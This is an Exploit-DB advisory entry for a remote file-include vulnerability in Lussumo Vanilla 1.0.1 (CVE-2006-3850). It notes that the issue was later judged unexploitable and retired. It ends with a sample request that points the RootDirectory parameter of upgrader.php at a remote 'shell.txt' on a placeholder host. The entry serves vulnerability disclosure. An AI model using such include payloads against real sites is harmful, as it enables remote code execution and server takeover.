Lussumo Vanilla 1.0 RootDirectory Remote File Include Vulnerability

2006-07-24T00:00:00
ID EDB-ID:28260
Type exploitdb
Reporter MFox
Modified 2006-07-24T00:00:00

Description

Lussumo Vanilla 1.0 RootDirectory Remote File Include Vulnerability. CVE-2006-3850. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/19127/info

Vanilla is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

This issue affects version 1.0.1; earlier versions may also be vulnerable.

Further information reports that this issue cannot be exploited because the vulnerable parameter is defined with a hard-coded value. Therefore this BID is being retired.

http://www.example.com/[path]/setup/upgrader.php?RootDirectory=http://www.example2.com/shell.txt?